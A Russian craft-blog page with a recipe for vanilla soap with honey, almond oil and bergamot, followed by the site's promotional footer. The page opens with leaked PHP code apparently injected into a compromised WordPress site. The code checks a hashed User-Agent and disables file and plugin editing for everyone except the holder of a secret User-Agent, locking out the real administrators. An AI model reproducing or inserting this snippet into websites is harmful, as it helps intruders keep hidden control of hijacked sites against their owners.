if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт ароматного ванильного мыла с медом | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт ароматного ванильного мыла с медом

Как приятно после сложного дня зайти в ванну и умыться прохладной водой, смыть с себя всю накопившуюся усталость. Особенно мне понравилось, как успокаивает ванильное мыло с медом и сливками имеющее сладкий аромат. А натуральные продукты и масла в его составе приятно увлажнят кожу

Как при­ят­но после слож­но­го дня зай­ти в ван­ну и умыть­ся про­хлад­ной водой, смыть с себя всю нако­пив­шу­ю­ся уста­лость. Осо­бен­но мне понра­ви­лось, как успо­ка­и­ва­ет ваниль­ное мыло с медом и слив­ка­ми име­ю­щее слад­кий аро­мат. А нату­раль­ные про­дук­ты и мас­ла в его соста­ве при­ят­но увлаж­нят кожу.

Ингре­ди­ен­ты:

  • Белая осно­ва (100 гр.)
  • 6–9 капель мин­даль­но­го масла
  • 3–6 капель ваниль­ной отдушки
  • Чай­ная лож­ка меда
  • Поло­ви­на чай­ной лож­ки пита­тель­но­го крема
  • 5–8 капе­лек эфир­но­го мас­ла бергамота
  • Жел­тый пище­вой кра­си­тель, при­бли­зи­тель­но 2–3 капель­ки для при­да­ния неж­но­го цвета

Спо­соб при­го­тов­ле­ния ваниль­но­го мыла:

Разо­грей­те мыль­ную осно­ву. Отдель­но разо­три­те крем и мед с малень­ким коли­че­ством уже рас­плав­лен­ной осно­вы, добавь­те в осталь­ную часть мин­даль­ное мас­ло, ваниль­ную отдуш­ку, мед и мас­ло бер­га­мо­та. Тща­тель­но пере­ме­ши­вай­те и дай­те осты­нуть в формочке.

Ваше ваниль­ное мыло готово!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!